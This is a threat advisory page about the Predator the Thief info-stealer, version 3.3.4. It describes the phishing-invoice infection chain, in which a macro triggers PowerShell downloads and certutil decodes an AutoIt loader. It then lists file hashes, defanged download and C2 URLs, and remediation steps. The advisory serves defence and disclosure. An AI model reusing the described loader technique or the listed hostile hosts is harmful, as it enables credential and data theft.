April 18, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Rewterz Threat Alert – Cryptocurrency Business Continued to be Targeted by Lazarus
January 8, 2020Rewterz Threat Advisory – CVE-2020-6377 – Google Chrome Audio Code Execution Vulnerability
January 9, 2020Rewterz Threat Alert – Cryptocurrency Business Continued to be Targeted by Lazarus
January 8, 2020Rewterz Threat Advisory – CVE-2020-6377 – Google Chrome Audio Code Execution Vulnerability
January 9, 2020
Severity
Medium
Analysis Summary
A new release of the malware known as Predator the Thief, labeled as version 3.3.4. There have been small development differences between each minor version, making this latest version very different from previous versions. It is active from as early as December 2019. The recent campaign uses phishing documents designed to look like invoices, all pushing the same payload of Predator the Thief.
Infection chain of Predator the Thief
nce the document is opened the malware performs the following operations:
1. AutoOpen macro runs the malware VBA script.
2. It downloads three files through PowerShell.
- VjUea.dat: Legitimate AutoIt3.exe
- SevSS.dat: Base64-encoded AutoIt script with certificate header.
- apTz.dat: RC4-encrypted Predator the Thief
3. It then uses a legitimate AutoIt3.exe to run decoded AutoIt script.
“SevSS.data” is decoded by certutil.exe, a legitimate command line program that is part of the Certificate Service in Windows. The script is then run to decrypt apTz.dat into the payload of Predator the Thief.
Impact
Data exfiltration
Indicators of Compromise
SHA-256
- 670c3bb2d41335cee28f4fe90cf9a76a9b68a965e241df648a0198e0be6a9df1
- 46710b47763f27a6ffb39055082fa22e3e5a2bd9ae602ea651aefe01079e0c8d
- bcf6f482a8a7e81d3e96c54840d2d341d12923a3277688eddd2534d614dab70b
- 67093ad07a8342c42b01dd1645dbd18ea82cc13081b5ba84fa87617675cc7054
- 76a4e5baa3650dff80df493fa4aaf04d37bb5d20d7a569ec3bc550bdfb3c1991
- 50f7c8b3c825930b242dceef47bec9e7039bff40362f960c84cd9ff9edafc94b
- 759dc4b2ab45e6faf7a9f1325f75956c1954f3695400e66670f6950c06db44c2
- 4792c8a417b7accd3092788504332881154785a9ee2db2e93e63306813497c7c
- 35820393614d39e600b4afc3332de4547f25f4b5d076b43ea1af98020ec5a8f0
- 91722acec748c76de9d98e1797186a03dc9ab2efbd065a0f04e7c04654644dba
- 14b25649cf6f10670fc8e1afb923895ae0300a8feb78e5033488879d5206267b
- b53dd972d466e2d2ded3ce8cc7af28eda77f2939de0d9c1fbd3663fd057ea87d
- cb76b3ee29944a7d8b839025c1e9eae32b188443a7bf5cbfbf7eabe682424d92
- 68875254237c6f887d0f9771b8f356381f8a0384841ae422ef2d49faf30932e9
- 248ad207c6891d84765ea81d0aa3ca04bee69e0467dff8d693fa4eb76a491c16
- 4cac9af0198fe82f5ae87ac19e964471f6e87461743a21054c2f063be9c2c514
- 3118a980caf696fc5c84cb9ee88015f3a0cf205f021270b1f4f313bbae6b6464
- caeb9b2518d47f3df6f2ec515ce314dca6993370b9e124479bff959075379a90
- e5420cf530192596f2c388eeecfd8d6754af06939461629c94d509b991b967f4
- c392229b34617ee5bc9e48bacde3fc8e9046eea51e6101624d312719e970dc00
- 6215d8637357be64510af9daf778ce12bf8401cdd16216a24da257d42217c65b
- c97d6c8075bd9c55fbdcadda6c69c21432d59e872acdc860228b2709edbb6e6c
- 36fe75ca8ca8bcef475737dae530e50eb262484ba0cd4dac0081d8508412d0ad
- dce3bb2609c710339569404f8dce4e0786521bb0de46ad9358fc27d5b687f043
URL
- hxxp[:]//stranskl[.]site/
- hxxp[:]//stranskl[.]site/apTz[.]dat
- hxxp[:]//stranskl[.]site/VjUea[.]dat
- hxxp[:]//stranskl[.]site/SevSS[.]dat
- hxxp[:]//stranskl[.]site/api/check[.]get
- hxxp[:]//stranskl[.]site/api/gate[.]get
- hxxp[:]//corp2[.]site/
- hxxp[:]//corp2[.]site/api/check[.]get
- hxxp[:]//corp2[.]site/api/gate[.]get
- hxxp[:]//tretthing[.]site/
- hxxp[:]//tretthing[.]site/api/check[.]get
- hxxp[:]//tretthing[.]site/api/gate[.]get
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious about emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.
